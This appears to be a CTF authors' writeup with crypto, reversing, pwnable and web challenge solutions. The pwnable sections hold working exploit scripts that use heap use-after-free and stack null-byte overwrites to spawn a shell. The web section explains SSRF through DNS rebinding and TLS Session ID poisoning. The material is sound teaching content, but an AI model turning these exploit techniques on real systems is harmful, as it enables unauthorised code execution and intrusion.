# 2022 Spring GoN Open Qual CTF Authors' Writeup
## Table of Contents
- [A. CS448](#A.-CS448)
- [B. Oxidized](#B.-Oxidized)
- [C. Run](#C.-Run)
- [D. Nonsense](#D.-Nonsense)
- [E. NullNull](#E.-NullNull)
- [F. Unconventional](#F.-Unconventional)
- [G. Trino: Albireo](#G.-Trino:-Albireo)
- [H. Trino: Pieces](#H.-Trino:-Pieces)
- [I. Trino: Rendezvous](#I.-Trino:-Rendezvous)
- [J. Trino: Mirai](#J.-Trino:-Mirai)
- [L. input box](#L.-input-box)
- [M. pyc](#M.-pyc)
- [O. Interchange](#O.-Interchange)
- [P. Showdown](#P.-Showdown)
- [Q. NSS](#Q.-NSS)
## A. CS448
Category: Crypto\
Author: [c0m0r1]\
Solvers: 45
<details>
<summary>Description</summary>
From cs448 course, [Professor Kim](https://caislab.kaist.ac.kr/kkj/) taught me that -
`The keystream generator determined entire security of the stream cipher`
...Then why doesn't anyone design ciphers using urandom?
How to decrypt? Who cares? At least it ensures confidentiality :)
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic knowledge about XOR encryption & Cryptographically safe/unsafe RNG
1. **Objective** - Understand frequency analysis to break skewed RNG-based stream cipher
The main vulnerability of the implementation is in the `encrypt` function (chal.py#L39):
```
enc = (get_random_u8() + key * i) % 0xff
```
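Because the reduction uses the `%` operator instead of the `&` operator, the output derived from urandom is skewed.
`get_random_u8` returns an integer in [0, 255], and both 0 and 255 reduce to 0 modulo `0xff`. The `i`th keystream byte therefore equals `(key * i) % 0xff` with probability 2/256, while every other value in [0, 254] occurs with probability 1/256.
Thus, with a known key, the attacker can predict the plaintext bytes by collecting many ciphertexts and applying frequency analysis to each byte position.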
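
The bias can be checked exhaustively without talking to the server. The sketch below is not taken from the challenge source: `keystream_distribution` and `most_likely_keystream_byte` are hypothetical helpers that enumerate all 256 possible outputs of `get_random_u8` and apply the reduction from `chal.py#L39`.

```python
from collections import Counter

def keystream_distribution(key, i):
    """Count each keystream value over all 256 equally likely RNG outputs."""
    # Same reduction as the vulnerable line: (r + key * i) % 0xff
    return Counter((r + key * i) % 0xff for r in range(256))

def most_likely_keystream_byte(key, i):
    """Return the keystream value that occurs twice instead of once."""
    return keystream_distribution(key, i).most_common(1)[0][0]

if __name__ == "__main__":
    dist = keystream_distribution(7, 3)
    print(most_likely_keystream_byte(7, 3), dist[(7 * 3) % 0xff])
```

The solver relies on the same effect: for each position it takes the most frequent ciphertext byte and XORs it with `(key * i) % 0xff`.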
</details>
<details>
<summary>Solver Code</summary>
```python=1
# Python 2 script (uses str.decode('hex'))
import random
import time
from pwn import *
import copy
IP = "127.0.0.1"
PORT = 13102
ITER = 10000
context.log_level = "ERROR"
def get_enc_flag(p, key):
    p.sendlineafter(">> ", "3")
    p.sendlineafter(">> ", str(key))
    res = p.recvline().split(":")[-1].strip().decode('hex')
    return res
p = remote(IP, PORT)
st = time.time()
enc = get_enc_flag(p, 0xffff)
flag_len = len(enc)
print("[+] flag_len : %d"%flag_len)
flag = ""
# freq_li[i][b] counts how often byte b appeared at ciphertext position i
freq_li = [[0 for _ in range(0x100)] for _ in range(flag_len)]
for j in range(ITER):
    enc = get_enc_flag(p, flag_len + 1)
    for i in range(len(enc)):
        freq = freq_li[i]
        freq[ord(enc[i])] += 1
for i, freq in enumerate(freq_li):
    # the most frequent byte corresponds to the biased keystream value
    dec = freq.index(max(freq))
    flag += chr(dec ^ ((flag_len + 1) * i) % 0xff)
print("[+] flag : %s"%flag)
print("[*] script end in %d sec"%(time.time() - st))
```
</details>
## B. Oxidized
Category: Pwnable\
Author: [c0m0r1]\
Solvers: 13
<details>
<summary>Description</summary>
We cannot swim against the tide.
Now it's time to learn the hottest and oxidized system programming language.
![img](https://i.imgur.com/SkqbH5L.png)
Note : This challenge is designed for beginners.
You don't have to worry like "I've never encountered Rust!" or "I have no idea what Box, drop, or as_ref is!".
As we've always done, look at the source code, google what it is, and see how it's represented as a binary.
You can definitely solve this challenge and make step up.
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic knowledge about tcache exploits on libc 2.27 & the concept of Rust and its internals.
1. **Objective** - Understand how Rust code is compiled to a binary & how to exploit a UAF from unsafe code.
The main vulnerability of the implementation is in the `delete` method of `KVStore` (main.rs#L46):
```
fn delete(&mut self, key : u64) -> bool{
    match self.search(key) {
        None => false,
        Some(n) => {
            drop(unsafe { Box::from_raw(n as &mut Node as *mut Node) } );
            true
        },
    }
}
```
A UAF occurs because `delete` destructs the `Node` object without popping it from the vector.
The sizes of the important objects can be determined by reversing or with a debugger:
- `Box<Node>` : 0x18
- `Box<String>` : 0x18
- `String` : various (size can be controlled by `with_capacity` method)
An attacker can exploit this UAF with the given primitives using the well-known glibc 2.27 tcache exploit.
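
The solver forges `Node` objects by writing into a `String` buffer that lands in a freed node-sized chunk. A minimal sketch of that forged layout follows. It is inferred from the solver payload rather than from `main.rs`, so the field order (key, pointer to value, `is_string` flag) and the helper name `fake_node` are assumptions.

```python
import struct

NODE_CHUNK_SIZE = 0x18  # size of Box<Node> as listed above

def fake_node(key, value_ptr, is_string=False):
    """Pack a forged node: u64 key, u64 pointer to the value, u8 is_string."""
    raw = struct.pack("<QQB", key, value_ptr, int(is_string))
    # The forged bytes must fit in the chunk that the freed Node occupied.
    assert len(raw) <= NODE_CHUNK_SIZE
    return raw

if __name__ == "__main__":
    # Placeholder address; the real exploit uses a leaked heap or libc address.
    print(fake_node(0xdeadbe02, 0x555555559000).hex())
```

With `is_string` set to 0, searching for the forged key reads through the pointer (a leak) and updating it writes through the pointer, which is how the solver reaches `__free_hook`.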
</details>
<details>
<summary>Solver Code</summary>
```python=1
from pwn import *
LOCAL = False
DEBUG = True
BINPATH = "../deploy/chal"
IP = "127.0.0.1"
PORT = 13100
binary = ELF(BINPATH)
libc = ELF("./libc.so.6")
if LOCAL:
    p = process(BINPATH)
else :
    p = remote(IP, PORT)
if DEBUG:
    context.log_level = "DEBUG"
def main(p):
    p.recvuntil(">> ")
def insert(p, key, val, is_string = False, size = 0):
    main(p)
    p.sendline("1")
    p.sendlineafter(">> ", str(key))
    p.sendlineafter(">> ", "Y" if is_string else "N")
    if is_string:
        p.sendlineafter(">> ", str(size))
        p.sendlineafter(">> ", val)
    else:
        p.sendlineafter(">> ", str(val))
    p.recvline()
def delete(p, key):
    main(p)
    p.sendline("4")
    p.sendlineafter(">> ", str(key))
def search(p, key):
    main(p)
    p.sendline("2")
    p.sendlineafter(">> ", str(key))
    return p.recvuntil("1.")[:-2]
def update(p, key, val, is_string = False, size = 0):
    main(p)
    p.sendline("3")
    p.sendlineafter(">> ", str(key))
    if is_string:
        p.sendlineafter(">> ", str(size))
        p.sendlineafter(">> ", val)
    else:
        p.sendlineafter(">> ", str(val))
    p.recvline()
def view_all(p):
    main(p)
    p.sendline("5")
    p.recvuntil("---------------------")
    return p.recvuntil("1.")[:-2]
def exit(p):
    main(p)
    p.sendline("5")
# leak heap address
insert(p, 1, 1)
delete(p, 1)
if LOCAL:
    heap_base = int(view_all(p).split("->")[0]) - 0x52f0
else:
    heap_base = int(view_all(p).split("->")[0]) - 0x52f0
print(heap_base)
print("[+] heap base : 0x%x"%heap_base)
# get libc ptr on heap region
insert(p, 2, "a", True, 0x800)
delete(p, 2)
# create fake node with string to leak libc
payload = p64(0xdeadbe02)
if LOCAL:
    payload += p64(heap_base + 0x53b0) # large chunk address
else:
    payload += p64(heap_base + 0x53b0)
payload += p8(0) # is_string field
insert(p, 3, payload, True, 0x18)
# get libc address
if LOCAL :
    libc_base = int(search(p, 0xdeadbe02)) - 0x3ebca0
else:
    libc_base = int(search(p, 0xdeadbe02)) - 0x3ebca0
print("[+] libc base : 0x%x"%libc_base)
# create fake node with string to hook overwrite
insert(p, 4, 1)
delete(p, 4)
free_hook_addr = libc_base + libc.symbols["__free_hook"]
system_addr = libc_base + libc.symbols["system"]
payload = p64(0xdeadbe04)
payload += p64(free_hook_addr)
payload += p8(0) # is_string field
insert(p, 5, payload, True, 0x18)
update(p, 0xdeadbe04, system_addr)
# trigger free to get shell
insert(p, 6, "/bin/sh", True, 0x18)
delete(p, 6)
p.interactive()
```
</details>
## C. Run
Category: Reversing\
Author: [c0m0r1]\
Solvers: 20
<details>
<summary>Description</summary>
Time is running out.
There's nowhere to run.
You need to run this program.
So run.
RUN.
NOW
[BGM](https://youtu.be/mw2kKyJu9gY?t=126)
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic x86_64 reversing skills
1. **Objective** - Understand Run Length Encoding and Bit Scan Reverse instruction
The binary implements a simple Run Length Encoding in the following format.
![pic1](https://i.imgur.com/22xyW0d.png)
![pic1](https://i.imgur.com/yZqOMf1.png)
Basic reversing and knowledge of bit operations are enough to solve this challenge with ease.
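
The format can also be read off the decoder in the solver: each run of zero bits terminated by a one bit is stored as a unary-coded bit width followed by the run length, least significant bit first. The sketch below works on plain lists of bits for clarity. `decode_runs` mirrors the solver's `decode`, while `encode_runs` is a hypothetical inverse written for illustration and is not taken from the challenge binary.

```python
def encode_runs(bits):
    """Encode a bit list (ending in 1) as [width-1 ones, 0, run length LSB-first]."""
    out, run = [], 0
    for bit in bits:
        if bit == 0:
            run += 1
            continue
        width = max(1, run.bit_length())  # number of bits needed for the run length
        out += [1] * (width - 1) + [0]    # unary prefix announcing the width
        out += [(run >> k) & 1 for k in range(width)]
        run = 0
    return out

def decode_runs(code):
    """Inverse of encode_runs: emit `run` zeros followed by a single one."""
    out, pos = [], 0
    while pos < len(code):
        width = 0
        while True:                       # count prefix bits up to and including the 0
            bit = code[pos]
            pos += 1
            width += 1
            if bit == 0:
                break
        run = 0
        for k in range(width):            # run length, least significant bit first
            run |= code[pos] << k
            pos += 1
        out += [0] * run + [1]
    return out

if __name__ == "__main__":
    sample = [0, 0, 0, 1, 1, 0, 1]
    print(encode_runs(sample), decode_runs(encode_runs(sample)) == sample)
```

The real encoder presumably derives the width with a Bit Scan Reverse instruction; `int.bit_length()` plays that role here.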
</details>
<details>
<summary>Solver Code</summary>
```python=1
#!/usr/bin/python3
import struct
def u64(x):
    return struct.unpack("<Q", x)[0]
def read_bit(b, n):
    return 1 if (b[n // 8] & (1 << (n % 8))) != 0 else 0
def write_bit(b, n, i):
    b[n // 8] |= (b[n // 8] | ((1 if i != 0 else 0) << (n % 8)))
def decode(src, dst):
    src_curr = 0
    src_end = len(src) * 8
    dst_curr = 0
    run_length_log = 0
    run_length = 0
    while src_curr < src_end :
        # unary prefix: count bits up to and including the first 0 bit
        run_length_log = 0
        while True:
            if src_curr >= src_end:
                return
            bit = read_bit(src, src_curr)
            src_curr += 1
            run_length_log += 1
            if not bit:
                break
        # run length, least significant bit first
        run_length = 0
        for i in range(run_length_log - 1):
            run_length |= (read_bit(src, src_curr) << i)
            src_curr += 1
        run_length |= (read_bit(src, src_curr) << (run_length_log - 1))
        src_curr += 1
        # emit run_length zero bits followed by a single one bit
        for _ in range(run_length):
            write_bit(dst, dst_curr, 0)
            dst_curr += 1
        write_bit(dst, dst_curr, 1)
        dst_curr += 1
if __name__ == "__main__":
    with open("flag.enc", "rb") as f:
        data = f.read()
    file_size = u64(data[:8]) // 8
    src = list(data[8:])
    res = [0 for _ in range(file_size)]
    decode(src, res)
    with open("flag", "wb") as f:
        f.write(bytes(res))
```
</details>
## D. Nonsense
Category: Reversing\
Author: [c0m0r1]\
Solvers: 17
<details>
<summary>Description</summary>
This binary's routine doesn't make any sense
Let's just beat up the author rather than reversing this
![img](https://i.imgur.com/v3956cZ.png)
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic x86_64 reversing skills
1. **Objective** - Understand signal handler logic and binary processing automation
The provided binary does a few simple things:
- Registers a SIGSEGV handler
- Reads a 0x40-byte string from argv[1]
- For every 2 bytes of the flag, dereferences the hashed value of those bytes
- In the SIGSEGV handler, checks the fault address, skips the intended SIGSEGV, and performs the flag check
This challenge can be solved in various ways:
- Reverse the hash logic, identify what it is (Quark), and find an implementation to crack it
- Use python ctypes to automate the hash crack (author's way)
- Use gdbscript to automate the hash crack
</details>
<details>
<summary>Solver Code</summary>
```python=1
# Python 2 script (concatenates struct.pack output with str)
from ctypes import *
import struct
def p16(x):
    return struct.pack("<H", x)
binary = cdll.LoadLibrary('./main')
binary_base = cast(binary._handle, POINTER(c_longlong)).contents.value
do_hash_type = CFUNCTYPE(c_longlong, c_ushort)
func = do_hash_type(binary_base + 0xAB7)
# build a lookup table from hash value to 2-byte input
enc_dict = {}
for i in range(0x10000):
    assert(enc_dict.get(i) == None)
    enc_dict[func(i)] = i
# read the expected hash values out of the loaded binary
enc_arr = []
for i in range(24):
    enc_arr.append(cast(binary_base + 0x206020 + i * 8, POINTER(c_longlong)).contents.value)
flag = ""
for enc in enc_arr:
    flag += p16(enc_dict[enc])
print("flag : %s"%flag)
```
</details>
## E. NullNull
Category: Pwnable\
Author: [Xion]\
Solvers: 25
<details>
<summary>Description</summary>
I know there's been some trust issues on "baby" CTF chals, but this really is a NullNull(colloquially "spacious", "easy" in KR) pwnable chal...
</details>
<details>
<summary>Solution</summary>
**TL;DR**: Simple pwnable challenge exploiting a single null byte overflow on the stack into `rbp` (Frame Pointer Overwrite), caused by `char buf[N]; scanf("%Ns", buf);`
Unlike some other functions such as `fgets`, `scanf` reads up to the specified width in characters and then appends a null byte after them, so it can write up to N+1 bytes into `buf`.
This causes a single null byte overflow into the saved `rbp` inside the echoing function (menu choice 1). After immediately returning to the main loop, `rbp` holds the overwritten value.
Inspection of how `rbp` is used in the main loop quickly shows that arguments are saved on the stack and accessed relative to `rbp`, specifically `arrlen = rdi = [rbp - 0x18]` and `arrptr = rsi = [rbp - 0x20]`. Thus the overwrite shifts `rbp` downwards by 0x0 ~ 0xf0, possibly making the loop access different array length and pointer values on the stack.
Players can retry until `rbp&0xff` is a desired value. The author chose 0x10, as overwriting this byte with null shifts the stack frame such that `arrlen = addr of somewhere inside loop()` (last return address) and `arrptr = rbp` (last saved rbp == our forged rbp).
Overwriting the main loop's return address with a one-shot gadget and returning is enough to pop a shell.
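
The effect of the overwrite on the `rbp`-relative slots can be sketched with plain arithmetic. The helper names and the example address below are hypothetical; only the offsets 0x18 and 0x20 come from the analysis above.

```python
ARRLEN_OFFSET = 0x18  # arrlen is read from [rbp - 0x18]
ARRPTR_OFFSET = 0x20  # arrptr is read from [rbp - 0x20]

def null_byte_overwrite(rbp):
    """Return (new_rbp, shift) after the lowest byte of the saved rbp becomes 0."""
    new_rbp = rbp & ~0xff
    return new_rbp, rbp - new_rbp

def slots(rbp):
    """Addresses the main loop uses for arrlen and arrptr with a given rbp."""
    return rbp - ARRLEN_OFFSET, rbp - ARRPTR_OFFSET

if __name__ == "__main__":
    rbp = 0x7ffd00001210  # made-up stack address whose low byte is 0x10
    new_rbp, shift = null_byte_overwrite(rbp)
    print(hex(new_rbp), hex(shift), [hex(a) for a in slots(new_rbp)])
```

Since `rbp` is 16-byte aligned, its low byte takes one of 16 values. If those are roughly equally likely under ASLR (an assumption), about one attempt in 16 hits the desired 0x10, which is why the solver simply loops until its assertions pass.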
</details>
<details>
<summary>Solver Code</summary>
```python=1
#!/usr/bin/env python3
import warnings
from pwn import *
context.aslr = True
context.arch = 'x86_64'
context.log_level = 'info'
warnings.filterwarnings(action='ignore')
binary = ELF('../public/nullnull')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
oneshots = [0xe3b31, 0xe3b34]
MASK = (1<<64) - 1
def echo(s):
    p.sendline('1')
    p.sendline(s)
    p.readline()
def writeat(idx, val):
    p.sendline('2')
    p.sendline(str(idx))
    p.sendline(str(val))
def readat(idx):
    p.sendline('3')
    p.sendline(str(idx))
    return int(p.readline(False))
DEBUG = False
while True:
    try:
        libc.address = 0
        if DEBUG:
            p = process('../public/nullnull')
            # gdb.attach(p, gdbscript="handle SIGALRM ignore\nhandle SIGHUP ignore\n")
        else:
            p = remote('host2.dreamhack.games', 21224)
        # overwrite LOBYTE(rbp) = 0
        echo('A'*80)
        # If LOBYTE(rbp) was previously 0x10,
        # mem = overwritten rbp
        # len = addr of somewhere inside loop()
        binary.address = readat(3) - 0x1249
        assert binary.address & 0xfff == 0
        log.success(f'binary: 0x{binary.address:012x}')
        # stack addr leakable (but not needed)
        rbp = readat(2) - 0x120
        assert rbp & 0xff == 0
        log.success(f'rbp: 0x{rbp:012x}')
        # leak libc address
        libc.address = readat(0x120 // 8 + 1) - libc.libc_start_main_return
        assert libc.address & 0xfff == 0
        log.success(f'libc : 0x{libc.address:012x}')
        # set loop() return address to oneshot
        writeat(3, libc.address + oneshots[0])
        # return from loop(), triggering oneshot
        p.sendline('4')
        p.sendline('cat flag')
        print(p.recvregex(r'GoN{.*}'))
        break
    except KeyboardInterrupt:
        break
    except (EOFError, AssertionError):
        pass
    finally:
        try:
            p.close()
        except:
            pass
```
</details>
## F. Unconventional
Category: Reversing\
Author: [Xion]\
Solvers: 10
<details>
<summary>Description</summary>
![img](https://i.imgur.com/Zy1yiAE.png)
</details>
<details>
<summary>Solution</summary>
**TL;DR**: Simple x86_64 reversing, but with functionalities of `rsp` and `rax` exchanged. Reverse the custom AES-like encryption to get flag.
Throwing the binary into a decompiler immediately raises some kind of error about the stack frame being broken.
Inspection of the binary starting from `main()` shows that the calling convention is certainly not normal; each function starts with an `xchg rsp, rax`. There is also no use of `push` or `pop`, and function calls are assembled in an unusual way.
These observations, together with the hint in the description, show that `rsp` and `rax` are simply "exchanged", i.e. `rax` is now the stack pointer and `rsp` is now a general register for function return values (and much more).
Players can disassemble the binary, swap back all uses of `rsp` and `rax`, assemble it back and throw it into a decompiler for a proper decompilation. Alternatively, the binary is small enough to analyze by hand after understanding how the two registers are used.
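
A minimal sketch of the textual swap step, assuming Intel-syntax disassembly lines as input. `swap_rsp_rax` is a hypothetical helper, not the author's tooling. It only renames registers and does not restore the `push`, `pop`, `call`, or `ret` instructions that the binary replaces with explicit sequences.

```python
import re

# Equally sized sub-registers of rax and rsp. `ah` has no rsp counterpart,
# so it is deliberately left untouched.
_SWAP = {
    "rax": "rsp", "rsp": "rax",
    "eax": "esp", "esp": "eax",
    "ax": "sp", "sp": "ax",
    "al": "spl", "spl": "al",
}
_PATTERN = re.compile(r"\b(" + "|".join(_SWAP) + r")\b")

def swap_rsp_rax(asm_line):
    """Swap every rax-family register name with its rsp-family counterpart."""
    # A single regex pass avoids swapping a name twice.
    return _PATTERN.sub(lambda m: _SWAP[m.group(1)], asm_line)

if __name__ == "__main__":
    for line in ["xchg rsp, rax", "mov qword ptr [rax+8], rdi", "mov esp, 1"]:
        print(swap_rsp_rax(line))
```

The rewritten listing still has to be reassembled before a decompiler can use it, and any instruction that touches the stack pointer implicitly needs manual attention.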
</details>
<details>
<summary>Solver Code</summary>
```c=1
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <x86intrin.h>
typedef uint8_t Block[4][4];
Block key = {{0x21, 0xe5, 0x88, 0xac}, {0xbb, 0xb0, 0x97, 0xea}, {0x16, 0x42, 0x03, 0x0b}, {0x9b, 0xd2, 0x5c, 0x6c}};
const uint8_t sbox[0x100] = { // ARIA S-box #2
0xe2, 0x4e, 0x54, 0xfc, 0x94, 0xc2, 0x4a, 0xcc, 0x62, 0x0d, 0x6a, 0x46, 0x3c, 0x4d, 0x8b, 0xd1,
0x5e, 0xfa, 0x64, 0xcb, 0xb4, 0x97, 0xbe, 0x2b, 0xbc, 0x77, 0x2e, 0x03, 0xd3, 0x19, 0x59, 0xc1,
0x1d, 0x06, 0x41, 0x6b, 0x55, 0xf0, 0x99, 0x69, 0xea, 0x9c, 0x18, 0xae, 0x63, 0xdf, 0xe7, 0xbb,
0x00, 0x73, 0x66, 0xfb, 0x96, 0x4c, 0x85, 0xe4, 0x3a, 0x09, 0x45, 0xaa, 0x0f, 0xee, 0x10, 0xeb,
0x2d, 0x7f, 0xf4, 0x29, 0xac, 0xcf, 0xad, 0x91, 0x8d, 0x78, 0xc8, 0x95, 0xf9, 0x2f, 0xce, 0xcd,
0x08, 0x7a, 0x88, 0x38, 0x5c, 0x83, 0x2a, 0x28, 0x47, 0xdb, 0xb8, 0xc7, 0x93, 0xa4, 0x12, 0x53,
0xff, 0x87, 0x0e, 0x31, 0x36, 0x21, 0x58, 0x48, 0x01, 0x8e, 0x37, 0x74, 0x32, 0xca, 0xe9, 0xb1,
0xb7, 0xab, 0x0c, 0xd7, 0xc4, 0x56, 0x42, 0x26, 0x07, 0x98, 0x60, 0xd9, 0xb6, 0xb9, 0x11, 0x40,
0xec, 0x20, 0x8c, 0xbd, 0xa0, 0xc9, 0x84, 0x04, 0x49, 0x23, 0xf1, 0x4f, 0x50, 0x1f, 0x13, 0xdc,
0xd8, 0xc0, 0x9e, 0x57, 0xe3, 0xc3, 0x7b, 0x65, 0x3b, 0x02, 0x8f, 0x3e, 0xe8, 0x25, 0x92, 0xe5,
0x15, 0xdd, 0xfd, 0x17, 0xa9, 0xbf, 0xd4, 0x9a, 0x7e, 0xc5, 0x39, 0x67, 0xfe, 0x76, 0x9d, 0x43,
0xa7, 0xe1, 0xd0, 0xf5, 0x68, 0xf2, 0x1b, 0x34, 0x70, 0x05, 0xa3, 0x8a, 0xd5, 0x79, 0x86, 0xa8,
0x30, 0xc6, 0x51, 0x4b, 0x1e, 0xa6, 0x27, 0xf6, 0x35, 0xd2, 0x6e, 0x24, 0x16, 0x82, 0x5f, 0xda,
0xe6, 0x75, 0xa2, 0xef, 0x2c, 0xb2, 0x1c, 0x9f, 0x5d, 0x6f, 0x80, 0x0a, 0x72, 0x44, 0x9b, 0x6c,
0x90, 0x0b, 0x5b, 0x33, 0x7d, 0x5a, 0x52, 0xf3, 0x61, 0xa1, 0xf7, 0xb0, 0xd6, 0x3f, 0x7c, 0x6d,
0xed, 0x14, 0xe0, 0xa5, 0x3d, 0x22, 0xb3, 0xf8, 0x89, 0xde, 0x71, 0x1a, 0xaf, 0xba, 0xb5, 0x81
};
uint8_t sbox_inv[0x100];
const uint8_t chain[0x10] = {
0x3, 0xc, 0xb, 0x5,
0x8, 0x4, 0x7, 0xd,
0xf, 0x0, 0x6, 0xe,
0x9, 0x1, 0xa, 0x2
};
uint8_t chain_inv[0x10];
Block answer[3] = {
{
{0x89, 0xb4, 0xf7, 0x8f},
{0xe1, 0x8b, 0x29, 0x0d},
{0x37, 0xb1, 0x56, 0xc0},
{0xf0, 0x75, 0x42, 0x8e},
},
{
{0x1c, 0xc4, 0x2d, 0x1d},
{0xd9, 0x2e, 0xd4, 0x83},
{0x55, 0xee, 0x6b, 0xad},
{0x53, 0x40, 0x79, 0x65},
},
{
{0x07, 0x9a, 0x0a, 0xb2},
{0x9f, 0x82, 0x99, 0x10},
{0xdf, 0x45, 0x22, 0x6b},
{0x50, 0xdb, 0x0b, 0x40},
},
};
void SubBytes(Block block);
void RotateBlock(Block block);
void Twiddle(Block block);
void AddRoundKey(Block block, Block key);
void SubBytes_inv(Block block);
void RotateBlock_inv(Block block);
void Twiddle_inv(Block block);
void AddRoundKey_inv(Block block, Block key);
int main(void)
{
char buf[0x31] = {0,};
for (int i = 0; i < 0x100; i++)
sbox_inv[sbox[i]] = i;
for (int i = 0; i < 0x10; i++)
chain_inv[chain[i]] = i;
// shift key to last roundkey
Block dummy = {{0,},};
for (int j = 0; j < 0xc0ff33; j++) {
AddRoundKey(dummy, key);
}
for (int i = 0; i < 3; i++) {
Block round_key;
memcpy(round_key, key, sizeof(round_key));
for (int j = 0; j < 0xc0ff33; j++) {
AddRoundKey_inv(answer[i], round_key);
Twiddle_inv(answer[i]);
RotateBlock_inv(answer[i]);
SubBytes_inv(answer[i]);
}
}
memcpy(buf, answer, sizeof(answer));
printf("GoN{%s}\n", buf);
return 0;
}
void SubBytes(Block block)
{
// S-box substitution
for (int y = 0; y < 4; y++)
for (int x = 0; x < 4; x++)
block[y][x] = sbox[block[y][x]];
}
void SubBytes_inv(Block block)
{
for (int y = 0; y < 4; y++)
for (int x = 0; x < 4; x++)
block[y][x] = sbox_inv[block[y][x]];
}
void RotateBlock(Block block)
{
// rotate downwards by 0, 1, 2, 3
Block tmp;
for (int x = 0; x < 4; x++)
for (int y = 0; y < 4; y++)
tmp[y][x] = block[(y+4-x)%4][x];
memcpy(block, tmp, sizeof(tmp));
}
void RotateBlock_inv(Block block)
{
Block tmp;
for (int x = 0; x < 4; x++)
for (int y = 0; y < 4; y++)
tmp[y][x] = block[(y+x)%4][x];
memcpy(block, tmp, sizeof(tmp));
}
void Twiddle(Block block)
{
// Invert(Xor) -> Add -> Rotate
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[idx/4][idx%4] ^= (chain[idx] << 4) | chain[idx];
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[chain[idx]/4][chain[idx]%4] += block[idx/4][idx%4];
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[idx/4][idx%4] = __rolb(block[idx/4][idx%4], chain[idx] % 8);
}
void Twiddle_inv(Block block)
{
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[idx/4][idx%4] = __rorb(block[idx/4][idx%4], chain[idx] % 8);
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain_inv[idx])
block[idx/4][idx%4] -= block[chain_inv[idx]/4][chain_inv[idx]%4];
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[idx/4][idx%4] ^= (chain[idx] << 4) | chain[idx];
}
void AddRoundKey(Block block, Block key)
{
// XOR with current round key
for (int y = 0; y < 4; y++)
for (int x = 0; x < 4; x++)
block[y][x] ^= key[y][x];
// (Next key) = (Current key) |> SubBytes |> RotateBlock |> Twiddle
SubBytes(key);
RotateBlock(key);
Twiddle(key);
}
void AddRoundKey_inv(Block block, Block key)
{
Twiddle_inv(key);
RotateBlock_inv(key);
SubBytes_inv(key);
for (int y = 0; y < 4; y++)
for (int x = 0; x < 4; x++)
block[y][x] ^= key[y][x];
}
```
</details>
## G. Trino: Albireo
Category: Web\
Author: [Xion]\
Solvers: 3
<details>
<summary>Description</summary>
`Stage 1`
Look upon the brilliant stars of the night sky.\
Admire the pale gold and indigo blue of the double star `Albireo`.
> Note: All `Trino` chal server & public files are equivalent (excluding Specfile descriptions).
</details>
<details>
<summary>Solution</summary>
**TL;DR**: SSRF via [HTTPS Session ID Poisoning]
Players can send Curl requests to any desired URL. The Curl instance is initialized by the following code in `requester.py`:
```python=30
def load_opts(c):
    c.setopt(pycurl.PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
    c.setopt(pycurl.FOLLOWLOCATION, 1)
    c.setopt(pycurl.MAXREDIRS, 5)
    c.setopt(pycurl.TIMEOUT, 5)
    # Let the upper-level DNS resolver take care of caching,
    # this Curl instance is ephemeral anyways.
    c.setopt(pycurl.DNS_CACHE_TIMEOUT, 0)
    # You can test your https server with self-signed certs, how neat!
    c.setopt(pycurl.SSL_VERIFYPEER, 0)
    c.setopt(pycurl.SSL_VERIFYHOST, 0)
    return c
```
Players can only use HTTP/HTTPS requests, at most 5 redirections are allowed with a total timeout of 5s, and the DNS cache is disabled. Also, SSL cert validation is disabled (for convenience).
Since Flask sessions are (un)serialized through pickle and the challenge requires setting the 'flag' field to the value 'albireo' in the session, the path to the solution is clear: SSRF to either Redis or Memcached.
Either analysis or trial-and-error will reveal the following:
1. HTTP + Redis fails due to "Host:" header.
2. HTTPS + Redis fails due to null bytes inside command line. Specifically, Redis command parser will choke on the null byte and receive data without processing anything until client buffer limit is full.
3. HTTP + Memcached fails due to "HTTP/" at end of request line.
4. HTTPS + Memcached is the only feasible solution, but how do we control data to be sent through HTTPS?
Considering all possible data fields in an HTTPS request (specifically the ClientHello), one field looks promising: the Session ID.
Enter the world of [HTTPS Session ID Poisoning]. The technique works as follows:
1. Send a domain that resolves to either the attacker IP or an internal IP (DNS rebinding attack).
2. The domain first resolves to the attacker IP, and the attacker's server responds with an attacker-chosen Session ID (TLS-level) plus a redirect to the same domain (HTTP-level).
3. The domain now resolves to the internal IP. Since the domain is the same, Curl assumes that the Session ID must be reused and sends the ClientHello to the internal IP with the **attacker-controlled Session ID**.
Now we have an SSRF primitive that sends 0x20 arbitrary bytes. The author uses Memcached meta commands to send as much data as possible in a single SSRF request.
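
The 0x20-byte budget is the reason the payload has to be delivered in small pieces. The sketch below mirrors the `ms_init` / `ms_append` helpers from the solver and checks that every command fits in one Session ID. `build_session_ids` is a hypothetical wrapper, and the key `s:0123456789ab` is only the example from the solver's comments.

```python
SESSION_ID_LIMIT = 32  # a TLS Session ID carries at most 32 (0x20) bytes

def ms_init(key):
    """Meta-set command that stores an empty value under `key`."""
    return f"\nms {key} 0\n\r\n".encode("ascii")

def ms_append(key, data):
    """Meta-set command in append mode (MA) that adds `data` to `key`."""
    return f"\nms {key} {len(data)} MA\n".encode("ascii") + data + b"\r\n"

def build_session_ids(key, payload, chunk=6):
    """Split `payload` into commands that each fit in a single Session ID."""
    cmds = [ms_init(key)]
    cmds += [ms_append(key, payload[i:i + chunk])
             for i in range(0, len(payload), chunk)]
    for cmd in cmds:
        assert len(cmd) <= SESSION_ID_LIMIT, cmd
    return cmds

if __name__ == "__main__":
    for cmd in build_session_ids("s:0123456789ab", b"A" * 13):
        print(len(cmd), cmd)
```

With a 14-character key, a 6-byte chunk yields a command of exactly 32 bytes, so each SSRF round trip appends at most 6 bytes of the pickle payload.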
> Note: This challenge is a simplified version of [hxp CTF 2020 security scanner], although the author recognized the challenge after discovering the Black Hat presentation...
</details>
<details>
<summary>Solver Code</summary>
Solver code is ~~blatantly copied~~ mostly based on the custom TLS server from [hxp CTF 2020 security scanner] writeup. Players can alternatively grab any TLS server implementation and modify Session ID as necessary.
